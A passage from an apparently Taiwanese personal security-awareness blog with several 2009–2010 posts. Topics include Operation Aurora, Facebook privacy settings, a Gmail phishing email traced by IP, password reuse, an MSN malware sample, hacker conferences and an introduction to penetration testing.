但是，要徹底解決確不太容易，像是一些交易平台(B2C、C2C)衍生的詐騙問題，光靠資料流的層面是無法解決的，還需要金流、物流方面的配合，但這已經橫跨好幾家公司了。或許，還得要法令的配合才行。

五、「未知弱點」

這點，不可否認是很艱困的一點。重點在於「未知弱點揭漏」的時刻，相關單位是否有足夠的敏感度能夠知悉，或收到一手訊息。有時即使知道問題，也無法予以關閉系統，因為有營運或其他考量，畢竟 IT 往往是支援單位，IT 也只能＠＊％＃＆。
關閉系統或停用該功能，通常可以達到有效的因應。否則，IT 往往也只能先施以緩和、修補措施，設法最終再完成強化、防禦作業了。

這裡再殘酷的補上兩腳：

六、「資安打手」
有些單位的資安工作從來不是應付外來攻擊者的，是用來對付內部異己人士、砸自己人腳、凸顯自我官威的...資安亂象，族繁不及備載。或許前面一句話寫得太重，應該說七分對內三分對外吧。政治角力介入凌駕專業之上，這邊就不敘述太多，打開電視就一堆了。

七、「有發生啥事嗎」
我不認為都是以上的原因，通常一再被黑跟這篇文講得差不多。甚至，根本也沒探究問題的成因，只把問題的表象做到復原工作；外面可能全世界都知道他們家出事了，可是他們家可能無人知悉，或只有該系統管理者知道；系統管理者怕究責就自我進行復原，但，根本問題仍然沒解決。最後，發生啥事了嗎？

原來，這才是最高智慧。

Please Rob Me!! XD ~~

2010-02-27T13:18:00.006+08:00

有郭網站：「Please Rob Me」
http://pleaserobme.com/

這個 Blog 中有很詳細的相關說明。裡面有段話我很喜歡：
「...我們不是在嚇大家不要分享任何資訊，也不是告訴大家地理資訊的應用都是不好的，而只是做善意的提醒：在你分享之前，先想想會不會有什麼嚴重的後果！分享地理資訊不全然是件壞事，只是要用對場合與方式！...」
~~來源為 [Mr./Ms. Days (MMDays) – 網路, 資訊, 觀察, 生活]部落格網站~~

再回想一下我之前的一篇文：「誰在看我的噗」。

我只能說，你自己如果也不尊重自己的隱私，哪，將會沒有人在乎你的。也就是說你在網路上裸奔，大家也只能看戲。

請務必尊重與注意隱私問題。

「高度精密與目標性」的攻擊事件

2010-02-12T13:45:00.002+08:00

自從一月十三日起，各新聞媒體傳出 google 宣布要退出中國市場開始，這事件就像連續劇一樣，每天上演著不同的情節。一開始爆出是利用 Adobe 未修補的漏洞，後來又說是利用 IE 0 Day。

極巧的是，消息一曝光開始，不到一天 Adobe 也推出更新版本到 V9.3.0 版，因為首波新聞內容提及 Adobe 漏洞問題，相關新聞在這、還有這裡。

後來攻擊漏洞也與微軟 IE 有關聯，IE 也在這兩天推出修補更新程式，相關新聞在這、還有這裡。所有被爆出的漏洞紛紛修補完畢。

期間也傳出不只一家企業遭受攻擊，可以參考這新聞。攻擊來源據傳在這新聞，且還利用了台灣的中繼跳板，新聞在這、還有這裡。整個新聞過程也充滿政治操作與行銷手法在裡面，因為，最後 google 又不打算退出中國市場了，新聞在這；況且，中國「上網人數」比「美國人口」還要多耶，要放棄...打死我也不相信，即便今天放棄，明天也能宣示重返。這整個過程也可以看出是「高度精密與目標性」的反擊，相關一系列文章可以參考雅虎專題新聞：「谷歌遭駭槓上中國」。不過，這部分不是我要討論的重點。

這裡我比較關心的是：
1. 整個攻擊手法的運作方式。
2. 攻擊的目標、目的。
3. 思考可能造成的衝擊。

一、到底攻擊手法是啥呢？
從漏洞來看，是攻擊 adobe reader 以及 IE 瀏覽器漏洞；前者為檔案形式，後者為網站、網址(URL)，但...還需要更主動的方式配合，才能攻擊到「特定」的目標，很顯然的應該是利用「電子郵件」，這樣就能精準的將 exploit 送到特定目標手中，靜待魚兒上鉤。
話說回來，如果只要是騙取特定人士的帳密，大可不用如此麻煩，先前這篇手法即可。詐騙郵件＋釣魚網站就足夠了，且這好用太多了，也相對低調...XD。所以，攻擊一定會依據目標、目的不同，來配合不同手法的，這系列新聞中，也錯綜複雜著好幾件事的。
從手法來看相當接近「魚叉式網路釣魚」。這類攻擊手法，我們早已司空見慣了...XD。透過電子郵件將惡意的 pdf 檔案附件，或惡意的 URL 精準的送到攻擊目標信箱中，誘騙目標開啟附件或點選連結，透過 0 Day 漏洞，達成植入惡意程式的目的。
一旦惡意程式滲透內部網路，就可以進行下一階段的行動，搜尋特定資料、跳板再滲透...等，取得重要機密，或達成預設的攻擊目的。

二、攻擊的目標、目的？
由系列新聞來看，大概是兩個：特定人士的郵件帳密，以及特定公司的商業機密。

三、帶來哪些衝擊呢？
是否遭受相同手法攻擊？如何避免遭受類似手法攻擊？如何防禦類似攻擊手法？
這沒有標準答案的，每個資安事件都是可以成為防禦的強化作業，解法留給您思考吧！但往往想的人沒有決策權，有決策權的從來沒思考這些問題。

「魚叉式網路釣魚」攻擊手法：
可以 google 看看這個查詢結果。其實，前幾年台灣發現不少 0 Day 漏洞，除了 Adobe, IE 外，包含 .rar, .doc, .xls, .ppt ...等，每次的 0 Day 發現，也代表著一波波的攻擊發生，實現攻擊的目的。

說到這...你會不會想起了甚麼呢？是的，可能很多公司被打了還不知道痛的。

我相信台灣的資安技術能量絕對不輸國外的，但，缺的是甚麼呢？

補充資料：
1. WIKI:極光行動 (Operation Aurora) [2010/05/14新增]

請務必尊重與注意隱私問題！！

2010-01-15T22:26:00.009+08:00

很抱歉我得下重話！真的是非死不可~~

Google大神的開釋。資安之眼連結。

這是官方說法：Facebook新版隱私設定功能上線

===================================================
新聞來源: ITHOME

Facebook表示，該站不斷提供更多的設定以讓用戶能夠控制存取權限，但隨著該站的進化及新功能的推出，這些設定愈來愈複雜，因此才會發表更簡單的隱私設定首頁。文/陳曉莉 (編譯)

Facebook於近日開始針對全球3.5億的用戶部署新的隱私權功能，使用者在登入Facebook後會跳出一個要求重新設定隱私的視窗。新版隱私設定除了簡化設計網頁外，也提供可管理所有使用者所建立內容的工具。

進入新的隱私設定畫面，可直接看到五大類別的隱私設定，分別是個人檔案資料、聯絡資料、應用程式與網站、搜尋及封鎖黑名單等。每個類別中有各種可供設定的項目。在特定項目瀏覽權限的設定中，選項涵蓋所有人、朋友的朋友、只限朋友或是個人化設定。在個人化設定中能夠指定瀏覽該項目內容的對象，或是隱藏特定對象。

此外，Facebook亦發表一新的出版者隱私控制工具，可以管理用戶所張貼的任何內容，包括照片、影片及狀態更新等，當使用者每次上傳新內容時，皆能設定可存取的對象。

Facebook表示，該站不斷提供更多的設定以讓用戶能夠控制存取權限，但隨著該站的進化及新功能的推出，這些設定愈來愈複雜，因此才會發表更簡單的隱私設定首頁。

另外，由於許多Facebook用戶詢問能否隱藏友人名單，為此，該站自搜尋結果中移除了「檢視友人」的連結，降低用戶友人在該站的曝光度，用戶亦可進一步關閉在個人檔案中顯示友人列表的功能。

Facebook亦強化了對青少年的保護，即使青少年在內容選項中選擇與所有人分享，但最多也只能與友人、友人的友人，以及該名青少年所參與的學校或工作網，同時，青少年的資訊分享也被排除在搜尋引擎搜索之外。（編譯/陳曉莉）
===================================================

我相信九成九的人還是搞不清楚發生了啥事。因為大家都是辛苦種菜的農夫，忙著在冷氣房裡偷菜。這裡就說明一下，希望大家保護自己，也可以保護朋友。

下圖是先前的「搜尋隱私」設定畫面：

下圖是目前的「搜尋隱私」設定畫面：

當然還有一些其他的，但這「搜尋隱私」是我最關心的。以下是整理其差異：
1.先前版本可以直接關閉「我的朋友名單」，只要非朋友都看不到你的人際關係。即便搜尋到你，只要控管嚴謹也沒啥個資可看。新版卻不是這樣的，「所有人」都可以看到你的人際關係，包含沒有註冊的帳號，這是很嚴重的問題，但，我們似乎沒人關心這議題...ＸＤ。
[目前已經修改，可不對外開放；這點也就是被嚴重批判的原因]
2.先前版本還可以微調哪些項目進行開放。設定上還算是很彈性。
3.新版多了「我的個人檔案預覽」，這是好的，可以查看自己開放了哪些資訊。這大概是這部分唯一有進步的地方，大家一定要多利用這功能。
4.新版只能選擇關閉或開放「公開搜尋的結果」，也就是說要不要讓人家可以搜尋到你。但這樣是不夠的。
5.要找到一個人，還可以透過朋友的「人際關係」找到你。於是任何人就可以看到你所有的「人際關係」，加上(1.)的問題這就非常糟糕了。

也許很多人覺得，這些資訊沒什麼，即便「人際關係」公布在網路上又有啥關係呢？但真的是這樣嗎？絕對不是這樣的。因為，網路另一端的人是會有很多不同思路與意圖，是你意想不到的。
劇本Ａ：「人肉搜尋」希望這種網路暴力不致於發生在你我身上。啥~~不知道人肉搜尋，希望你不至於已經都把祖宗八代都Ｅ化了...
劇本Ｂ：不能講太多...但可以參考這則新聞：Facebook上露餡保險公司拒絕憂鬱症理賠
劇本Ｃ：不能講太多...但你有想到個人與工作之間的某種關聯呢？[2010/01/26新增參考連結]
劇本Ｄ：真的不能講太多...[2010/03/17新增參考連結，比我想像中來的快]
劇本Ｅ：壞心的 APP ...[玩心理遊戲收到大筆帳單，2010/03/22新增參考連結]

很多事情就是這樣，講不清楚又怕人被騙，講清楚了又會拿去騙人。有些事你得深思啊~~

再看看這則新聞[連結為資安之眼]：
===================================================
Facebook創辦人：網路隱私權已非潮流
新聞來源:中央社

社群網站facebook共同創辦人查克柏格 (Mark Zuckerburg)日前針對facebook上的隱私權爭議表示，人們習慣於網上分享各種資訊，保有用戶隱私權反倒是過時觀念。

Facebook是全球最大社群網站，會員人數高達3.5億人；過去幾年間，欲檢視他人的資料，必須先註冊，並獲得好友認證，才得進入他人檔案，如今卻開放給一般用戶，引來不少網友對隱私權疑慮。

查克柏格表示，當年在哈佛求學期間成立facebook，常被質疑：「為何會有人想把所有個人資料放在網路上？」但隨著部落格等網路應用興起，網友越來越習慣與他人分享資訊，可謂「社會常規逐漸產生改變」。

他說：「我們的角色，就是持續創新這個系統，以反映目前的社會常規。」他表示，網站擁有3.5億會員，做出這項改變，相當不容易，但卻十分重要，因為他相信「開放」將是潮流，也決定跟隨這個潮流。

Facebook隱私權爭議，已讓不少用戶感到困擾，查克柏格這回親上火線，解釋這項政策，至於能否平息反對聲浪，尚不得而知；但有國外媒體質疑，這極可能與廣告營收有關，也使facebook未來動向更值得關注。
===================================================

重要的是「你」認為呢？

歷久不衰的詐騙郵件-騙取帳密

2010-01-14T21:30:00.010+08:00

出現在信箱裡的一封郵件。還記得「電子郵件警覺性之觀念」嗎？應該很容易分辯吧！但是...我還是點選了連結，才發覺不對勁的。這就是人性的弱點，同樣一個動作做一百次，總是會有一次失誤～～

先看看 Mail Header...

IP Information - 211.239.151.232
IP address: 211.239.151.232
Reverse DNS: [Unknown]
Reverse DNS authenticity: [Unknown]
ASN: 9848
ASN Name: GNGAS (Enterprise Networks)
IP range connectivity: 1
Registrar (per ASN): APNIC
Country (per IP registrar): KR [Korea-KR]
Country Currency: KRW [Korea (South) Won]
Country IP Range: 211.192.0.0 to 211.255.255.255
Country fraud profile: Normal
City (per outside source): Unknown
Country (per outside source): -- []
Private (internal) IP? No
IP address registrar: whois.apnic.net
Known Proxy? No
Link for WHOIS: 211.239.151.232
嗯嗯，發信 IP 是 KR 來著。更加確認是釣魚郵件。

Phishing Mail 裡的連結聯到哪裡呢？畫面是不是相當熟悉呢？

但千萬要注意，它是一個釣魚網站，專門騙帳號密碼來著的，這個當然是騙取 gmail 的帳密。注意到它的網址嗎？「mail-google.dontexist.com」這跟 google 差很大吧！是個動態網域來著。目前對應的IP：

IP Information - 60.190.222.142
IP address: 60.190.222.142
Reverse DNS: [No reverse DNS entry per ns.zjnbptt.net.cn.]
Reverse DNS authenticity: [Unknown]
ASN: 4134
ASN Name: CHINANET-BACKBONE (No.31,Jin-rong Street)
IP range connectivity: 20
Registrar (per ASN): APNIC
Country (per IP registrar): CN [China]
Country Currency: CNY [China Yuan Renminbi]
Country IP Range: 60.160.0.0 to 60.191.255.255
Country fraud profile: Normal
City (per outside source): Beijing, Beijing
Country (per outside source): CN [China]
Private (internal) IP? No
IP address registrar: whois.apnic.net
Known Proxy? No
Link for WHOIS: 60.190.222.142
這應該就知道帳密會騙到哪了吧！

如要山寨各大入口網站的登入畫面，這不會太難的，況且還有現成的工具包幫你做呢？
只要手法細緻一點，往往能騙倒一堆人。

你分辨出來了嗎？

出賣你的人際關係，價值是啥？

2009-12-03T13:23:00.005+08:00

此篇暨
「你！出賣朋友嗎？」
「誰在看我的噗 (About Micro-Blogging)？」
「帳號密碼妙關聯，一般會員知多少」
相關社群網站系列之延伸。

社群網站存在已久了，但始終發展有限，自從臉書融入 Apple 的 APP 與線上遊戲的概念後，加上社交影響力瞬間爆紅，據傳將在美上市了。最近，也進入臉書看看裡面可以玩哪些花樣，發現對於他人的人際關係可以一覽無遺，這裡還是得烏鴉一下了。

雖然目前社群網站對於「隱私」上已經是相對注重了，不像早期的社群網站有許多惡劣手法，如「你！出賣朋友嗎？」一文所提。但...現行的「隱私設定」在預設值上，個人認為還是過於寬鬆的，預設是會開放許多隱私與人際關係的；另外一點就是設定上過於複雜，一般使用者多數是無法了解設定作業的。

對於網站上有關隱私部分，建議限縮下列的內容：
一、有關個人檔案隱私部分，建議僅針對朋友開放即可，除非你打算當個知名、公眾人物或推銷你自己。否則，不必要詳細填寫並展示出來。
二、有關搜尋隱私部分：

強烈建議把「我的朋友清單」勾選選項移除，也就是不要勾選。這樣，不認識的人就無法瀏覽你的人際關係。但是，朋友還是能瀏覽你「所有」人際關係，個人認為「該朋友」只能瀏覽我設定為「相同群組中的朋友」才是對的，目前並沒有看到系統有這樣的設定。
三、有關應用程式集隱私部分：

這部分也建議盡量縮限到最小。因為在這部分最怕遇到「惡意的應用程式」或「被惡意利用的應用程式」，遇到壞 APP 而官方統一的說法往往是：「這是委外開發商造成的問題」，但無論如何，權益受損的永遠是使用者，你不保護你自己也該保護一下你的朋友的。

對於設定複雜部分，個人倒是建議兩個功能：
一、設定上需要更人性化，要直接說明隱藏哪些資訊的範例(或動態圖型顯示我的哪些資訊可被隱藏)。
二、可以用不同的角色來瀏覽自己的資訊，如不認識的人、朋友的朋友、朋友...等角色，自己可以查看這些角色分別可以看到自己已經開放的哪些資訊。目前 FB 上僅能以「某朋友身分」來瀏覽自己的「基本資料」，如下：

但這還不夠，因為還有「不認識的人」、「朋友的朋友」等角色，你無法確定這些角色能看到哪些資料。可以稽核檢視自己開放的資訊，使系統達到更加重視隱私的目的，這點是很重要的。

以上除了保護自己的隱私外，也可以保護自己的朋友。網路個資已經外洩光了，要是社群網站再把個資彼此關聯起來，這，運用空間又變更大了。畢竟，社群網站大多透過知名演藝人員或政治人物起來的，對於公眾人物來說，這些資料似乎眾所皆知，甚至，有許多公眾人物還因此苦惱不已；但身為一般社會大眾並不需要完整揭露所有的資訊，有時公開了，要再回收是很困難的。

網路詐騙、電話詐騙...等，似乎也到了有轉型契機的時候了。

回到標題了，出賣你的人際關係，價值是啥？...答案是：「偷菜」。

帳號密碼妙關聯，一般會員知多少

2009-11-22T13:03:00.011+08:00

這篇文其實很早就想寫了，但總認為帳號密碼管理的殺手級應用，應該隔年就快出現了。但隔了一年又一年...@@，似乎遲遲不見相關應用。希望這篇文能引起大家對帳密管理重視與分級的觀念。

身為現在網路的一份子，你有多少組帳號密碼呢？E-Mail就好幾個，還有一堆會員帳號，不是嗎？很顯然的這裡面有很大的商機，但遲遲不見相關應用產品或技術。我大膽的說，帳密問題不解決，未來雲端將沒有安全性可言。

最近臉書夯很大，取用來做個解說吧！

上圖，大家應該頗熟悉這畫面，帳號是取用電子郵件名稱，我甲意，你的密碼是啥呢？有沒想過幾個劇本呢？
一、電子郵件名稱就是密碼？生日？[太好猜，社交一下很有機會]
二、密碼是123456。[弱密碼，隨便猜猜]
三、電子郵件信箱也是這邊登入的密碼。[這劇本非常奧妙，不少人都是用這吧]

看完帳號部分，接下來也要看一下密碼復原機制。不忘密碼枉為人...XD。

很簡單的機制，我也頗喜歡的，忘記密碼也不用擔心，直接把密碼復原的連結寄到帳號，也是一電子信箱，亦無法變更信箱...讚。這可以玩某種 One-Time Password 的把戲耶，密碼設定到極複雜，用完然後就忘記...XD。

這裡面需要注意幾個問題：
1. 帳號設定使用的電子信箱必須永久有效，不然，密碼忘記可就麻煩了。
2. 帳號設定使用的電子信箱管理權被拿走，這可是一舉淪陷多個帳號。
3. 帳號設定使用的電子信箱密碼忘記，哪，看看忘記密碼的機制能否救了。
4. 啥！密碼復原郵件被當垃圾郵件，收不到@@...XD
5. 這點才是我的重點，兩邊的密碼使用都是一樣的，應該有很多人都是這狀況的，會有啥問題呢？可妙了。

這時我們先切換到另外一個場景，你曾經填寫過哪些會員資料呢？不會都一五一十的寫吧！

填寫資料項目中，玲瑯滿目、五花八門，卻也可能處處充滿由網路世界跳脫至真實世界的巧門。填寫時需要多加以衡量其資訊的正確性與有效性，如非必要，能不填就不填，需要填就使用假設的一個虛擬個人資訊吧，網路是應該有另一個虛擬身份的。
每個網站的眾多資料項中，裡面有個幾乎是所有網站都會要必填欄位："密碼"與"E-Mail"。如果在會員網站留下的"密碼"，與"E-Mail"使用的密碼，是一樣的。那，無異於大辣辣的把另一組帳密告訴別人了嗎？

如果：
1. 這網站是釣魚、詐騙網站。
2. 這網站管理者盜賣個資、或加以濫用。
3. 這網站會員資料淪陷了、個資外洩了。

個資是可以做很多事的，電話可以發送詐騙簡訊、撥打詐騙電話，地址可以用來寄送中獎詐騙，E-Mail可以寄發各種社交郵件，有留下 IM 資訊的可能與留下的密碼是一致的(這個可以玩的花樣可多了...)，這些都可以做很多運用的。

密碼管理也需要分級設定的，還在用一個密碼打通關嗎？這風險是極高的。我想多數網友是使用好幾組密碼的，但這還不夠，還需要注意資訊的彼此關聯性，
提供一些方向參考：
1. 會員網站能不留資料就盡量別留吧！這樣密碼掉了也不會痛。
2. 一般商業會員網站，除了留假資料外，如果有密碼復原機制的，密碼就隨興吧！反正重設密碼還頗容易。最好是利用 E-Mail 做密碼復原，且 E-Mail 一經設定是無法變更的最佳，這樣只要守好 E-Mail 帳密即可。
3. E-Mail使用的密碼一定不能在其他地方使用(與其他密碼重複的)。
4. 跟$$有關的帳號密碼，請務必以謹慎方式處理，或配合實體機制(如動態密碼鎖...等)來強化安全。

看到這邊，是不是該把 E-Mail 使用的密碼都給變更一下呢？

MSN惡意程式紀念噗!!

2009-09-25T23:28:00.010+08:00

之前就有提過，小心朋友出賣你!!有圖有真相~~
看到熱騰騰的樣本，怎能放過，當然是把它下載囉!!

哇~，偽裝成圖片的樣式，不過附檔名還是執行檔。不過，足以呼巄過普羅大眾了。

整個手法的賣點：讓使用者以為下載的是圖檔，與惡意 MSN 訊息內容相符，劇本相當合理；當點選開啟後，非開啟圖檔卻是執行惡意程式，導致主機被植入惡意程式，然後再傳遞惡意 MSN 訊息，感染其他人。

來去 Virustotal 看看~~

只有三家防毒發現，還有兩家是報可疑，Wow~~令人意外的是MS (不過也是應該的，MSN主機應該能查覺大量重複的 MSN 訊息)，咦~~雲端卻在虛無飄渺中~~
參考資料：
ThreatExpert: http://www.threatexpert.com/report.aspx?md5=fc3aa77df7e6002743a7ed4abf4093fe

誰在看我的噗 (About Micro-Blogging)？

2009-07-18T20:42:00.006+08:00

「微型部落格」在網路上已經熱鬧好一陣子了。你噗了嗎？噗！是噗浪還是叭噗咧！

這裡有介紹頗多的「微型部落格」本身經常會遇到的問題，這裡也有詳細介紹「twitter」所遭遇到的攻擊問題可以參考。OWASP 排行榜上的第一名看來並非浪的虛名。

這篇文將會從使用者的角度來看「微型部落格」所帶來的衝擊，在說明前還是要回顧一下「網站」發展的過程，回顧歷史才能展望未來。不過，這裡我還是要強調一件事：網站攻擊不是現在才有，它一直存在，只是當今其他問題(如蠕蟲、系統漏洞攻擊)大多獲得控制(如線上更新、入侵防禦設備)，而你的網站卻一直沒有進步，當然成為標靶了。

「網站」發展的過程，我大概以兩個時間為分界點：2000年及2005年。在2000年以前談的網站大多是所謂的 ERP(企業資源規畫)、EIP(企業資訊入口)、CRM(客戶關係管理)、KM(知識管理)...等，況且哪時這類系統還有許多並非以網站來呈現的，且那時大多屬於封閉型的系統或網站型態，因此大部分躲過了威脅攻擊。

2000年後網路興起，「E化」是當時相當有名的名詞，也是動詞的哩，而網際網路公司可以說是紅到不行，當時股市衡量股價是否合理的方式是用本益比，但對網際網路公司是用「本夢比」，這樣你應該該可以想像網際網路公司即使虧錢，股價依舊高漲不歇，因為夢想多大、股價就有多高。這個時候大家談論的網站是啥呢？大家回想起來了嗎？B2B、B2C、C2C，還有物流、金流、資料流...，是否回想起來了呢？

B2B：大多是整合企業上下游之間的網站系統，這類網站大多封閉，是比較不容易出事，但不代表比較安全，因為會接觸到這邊的，大多可能屬商業間諜，行動隱密也低調；就算出事，業主本身也會相當低調，外界不會知道發生啥事。如果企業主發現你的對手對你的行銷、企劃...等有瞭若指掌的情況，可能要注意這類資訊系統的入侵可能性了。

B2C：簡單的說就是購物網站了，這點大家就應該很熟悉了吧。發生哪些資安問題呢？大家不會忘了吧...XD！google大神的開示。至於政府單位的 B2C ...XD，參考這篇吧。

C2C：簡單說就是拍賣交易網站了。造成哪些問題呢？簡單說就是「詐騙」、「詐欺」的社會問題。

在這個階段，另外有個神奇的東西，它本身不是網站方式呈現，但卻造就不少「釣魚網站」，對！就是 IM(Instant Messaging) 軟體，且它到現在還是很紅。
你！出賣朋友嗎？
網路上交朋友要小心
騙取MSN帳密的釣魚網站...真多!!

2005年之後，所謂的「網誌」大量出現，也就是所謂的部落格(Blog)、網路日誌、博客...等等。在前一波網路泡沫之後，Web 2.0 的觀念，帶動了許多網站的興起。這時你應該能想到很多網站吧！文字的部落客就像我這網站一樣，圖片的無名相簿網站，影音的 YouTube網站。在這個時候產生哪些問題呢？其實機乎不是資安問題，大多是社會問題，文字部分涉及言論自由、圖片部分涉及個人隱私或私密、影音部分多是犯罪實錄...XD。可以發現網路與生活越來越緊密了。

Web 2.0 簡單說，就是有個網站提供一個平台，讓使用者可以自己產生內容，並與其他使用者之間進行互動的一個網站。

2008年後開始出現「微網誌」，讓使用者與其他使用者的互動更加緊密了。所以有 Plurk、Buboo、facebook、twitter...的出現。而 XSS 漏洞透過這類社群網站獲得重生了，XSS 蠕蟲可以在一天之內感染數萬個使用者，甚至造成社群網站服務的效能崩潰。這只是資安問題的。我擔心的是另外一個問題。

B2C 的時代，大家已經把個資瘋狂的送到網路上，個資都已經外洩光了，Web 2.0的時代大家又把私密照片、或是犯罪實錄的影片給 Post 到網路上了。現在呢？噗阿噗！！大家把自己的行蹤、心情、喜怒哀樂、觀點...一大堆潛在人格特質給 Post 到網路上了。原來，在網路上要了解一個人好簡單啊。

微型部落格可能造成：陌生人比你媽還了解你，甚至，陌生人比你還了解你自己；而你卻還不認識隔壁老王。小心有心人的，當遇到難纏的對手，如果還涉及感情，哪可就麻煩了。

社交工程術的發展會將會更加極致，一旦詐騙電話更加了解你，不再是你熟悉的詐騙電話？一旦梁上君子熟知你的行蹤，不用在你的信箱、門牌做記號，上網就知道你在做啥？你該如何全身而退...網路真是讓人又愛又恨！！

我不是教你使詐

2009-06-12T22:24:00.011+08:00

我不是教你詐，
是教你看清世事。
免得你被賣了，
還在幫人數鈔票！

我不是教你詐，
是教你認清人性。
不可因為他們的好，忘了他們的壞；
不要因為他們的惡，忘了他們的善。

劉墉（1949年2月－），原名劉鏞，號夢然。
有關「人生、處世散文」之著作有：
* 《人生的真相》1992年
* 《冷眼看人生》1993年
* 《我不是教你詐》1995年
* 《我不是教你詐②》1996年
* 《我不是教你詐③》1998年
* 《你不可不知的人性》、《面對人生的美麗與哀愁》1999年
* 《你不可不知的人性②》2000年
* 《我不是教你詐④》2001年
* 《那條時光流轉的小巷》2002年
* 《人就這麼一輩子》2003年
* 《點滴在心的處世藝術》2004年
* 《花痴日記》2005年
* 《以詐止詐》2006年
* 《我不是教你詐⑤》2007年

第一次看《我不是教你詐》一書，是在學生時代，那時也剛好是第一本書出刊的時候，看到室友向圖書館借的書，也就一同分享了，看完只是覺得...好黑暗，果然大家都說「學生時代交的朋友，通常能夠永久」，畢竟學生時代還是單純的，且彼此認知與學習環境也相似，因此，對於「人性」仍然是茫懂。後來又接觸了另外一本書《厚黑學》，當時只是覺得不可思議，甚至，感到有些不屑，因為這跟所學完全不同，也是完全不同的思考邏輯，況且，哪時我只堅信「仁者無敵」，唉...當時年紀小。

該回到正題了，網際網路的世界呢？你知道網路上的陷阱嗎？你有嘗試去了解網際網路的黑暗面嗎？網際網路上的黑暗經濟是很盛行與強悍的。如果你是網際網路使用者，你應該多吸收資安訊息，如果你是 IT 從業人員，你得深入剖析，並思考可能因應之道才行。就像《我不是教你詐》這類書籍，也許你可以不用成為那一類的人，但，你應該了解他們的所作所為，並且，避免被牽連或波及的。當身處亂世時，得要有亂世的處世之道才行。

今年，應該說每年，台灣有幾個比較大所謂的資安技術年會或駭客年會，如 HIT 或 SyScan，這些大型資安技術活動都在七月份舉辦，而且都在北部，中南部的朋友就會比較辛苦點了；在國外最知名的應該就是 BlackHat / DEFCON 了。你對這類活動抱持甚麼態度或想法呢？

在 BlackHat/DEFCON 中，兩會議性質或許略有差異，參加者大多仍以資安或 IT 廠商、檢警調與軍方、資安研究人員、資安"社群"為大宗。如果在會場上夠活躍，可以認識相當多的同好者，且應該會連打招呼的時間都不夠的，慢慢的也就演變成為一年一度的盛會，也可順便見見一年不見的朋友，或兩三年不見的老友了。彼此談談過去一年的生活點滴、研究心得、威脅轉變、趨勢變化...等等，即便短短數天的會議，除了會議上的議題，還有更多非會議議題上的收穫，這是難能可貴的。

坦白說，我對 Hacking 技術的會議或論壇仍然沒有太多好感，因為這類技術對所謂的防守方或 IT 人員來說，並沒有太大的推廣，更重要的是，也沒有帶來解決方式或防禦措施。另一方面是對於地下經濟而言，這類活動卻像是大補丸一樣，他們會處心積慮的收集各種攻擊技巧、資安觀念、技術學習能力(或用流行話語：山寨能力)...等，而完全不需要自主開發，依樣畫葫蘆就能收到極佳效果了，甚至有的地下團體間，還處於彼此激烈競爭情況。相較於防守方或 IT 人員默默不聞或遮耳閉眼，有著完全相反的心態，防守方並不積極於這方面的知識吸收外，也沒有相對應的資安觀念，更嚴重的是連這方面交流管道都沒有。兩相比拼，一漲一消，高下立判。

對於資安技術年會或駭客年會，你應該有的心態：
1.了解最新的攻擊技術或未來可能的攻擊技術。
要學習最新的攻擊技術，參加會議當然是最直接的方式，對舉辦資安技術年會或駭客年會來說也是最主要的目的，但對你來說，沒有參加也不見得學習不到最新的攻擊技術，因為大部分的會議通常都會提供講師的簡報檔，如果有些門路，通常都可以拿到的。或者，網路上找找，通常也會有些收穫的。另外一個角度想，參加也不見得能完全吸收攻擊技術內容，因為有許多議程，也有需多主題與各方面的技術，很多時候也不見的能完全聽懂，如果不是你所了解、熟悉的技術內容，哪要聽懂也頗困難。至少，你應該要知道有這方面的攻擊技術是可以被利用的，而你的環境中是否會受此影響呢？這是關鍵。

2.攻擊技術是否被惡意利用。
有時資安技術年會或駭客年會也會有講師提出警告，或提出可能如何被利用的新機會，而地下經濟也會透過這類活動學習到新的攻擊技術或手法運用，這也是我對這類活動感冒的地方，因為，你無法控制別人如何拿去利用的。所以，你也必須思考這些攻擊技術或活動，對你的 IT 帶來多大的影響。就像一把手槍一樣，做槍的人沒事，亂開槍的就有事。

3.攻擊趨勢研判。
研判趨勢，說真的，並不容易。但你應該嘗試去研判，因為在做定論前，你會去學習、蒐集、分析、研判...等，而重要的也是這個過程，你會深入了解各種攻擊手法或利用方式，最後才能找出可能趨勢，它重要的是過程而不是結果。對於趨勢的研判，其本身也是很主觀的，且外在威脅變化也頗快，有時說公開的威脅趨勢可能也會導致破局的，所以，大家都有機會去預測的。

4.對於被利用的攻擊技術如何防範。
這點大多在會議中通常不會是重點。所以你得自己消化後，產生出一些防禦想法、抑制方式或偵測措施。或者可以在會場上與講師討論，或者與志同道合的盟友，共商復興大計。

5.交流、交友、交技術。
我認為這是最重要的，當然不一定是要跟講師交朋友的，可以當然是最好，要跟左鄰右舍的交個朋友才是重點，因為，會來參加這活動的，都是同圈子的人，彼此也能技術交流，更重要的是：你多了同圈子的夥伴，而這夥伴可能精通 FW, IDS, IPS, AV, WAF, UTM, Network, System, Coding, Hacking ... 等等，其一或更多或特殊稀有專長，做資安如果要單打獨鬥幾乎是不可能的，多認識朋友將會在做資安工作上極大的助力，我認為參加這類活動，你應該有的最基本心態。所以，不要吝嗇跟會場接觸到的人交換名片，因為，這將是你此行最大收穫。
另外，就是會議上的議題，或其他熱門的資安議題，都是打開話匣的題材，或交換彼此工作心得，或分享個人專長密技。這些都可以讓你可以交上朋友的。當日後遇上難解的問題、技術上的迷思、防禦上的困境...等等，你會發現資安路上不是只有你一個人的，多個朋友、夥伴，可以讓你更能得心應手的。

滲透測試之全民公測 (Open Penetration Test)

2009-05-23T20:14:00.005+08:00

滲透測試 (Penetration Test)，直到目前為止仍沒有一個標準的定義。比較大的共識應該是：以駭客的角度，由外部對目標網路環境進行滲透，找出任何可進行利用之弱點、漏洞或錯誤...等，並將結果回報。

隨著地下經濟的發展與資安觀念的不斷演變，滲透測試也面臨一些角色的轉變。早期滲透測試主要找系統面的漏洞居多，一方面是當時網站還屬靜態居多，且防火牆觀念並不發達，所以主要都是蠕蟲氾濫的系統漏洞問題，滲透測試的攻擊目標往往也都在這方面。現今，網站變動態網頁居多了，IPS&FW也建置部署了，系統自動更新機制也頗完善，系統漏洞已經不易直接攻擊，面臨的幾乎都是網站的威脅，加上 Web2.0&3.0...，攻擊方式更複雜，所以滲透測試的目標也漸漸轉移到網站上。未來呢？系統應用程式的挑戰？雲端的挑戰？滲透測試也會有新的面貌出現的。

滲透測試 vs 真實入侵
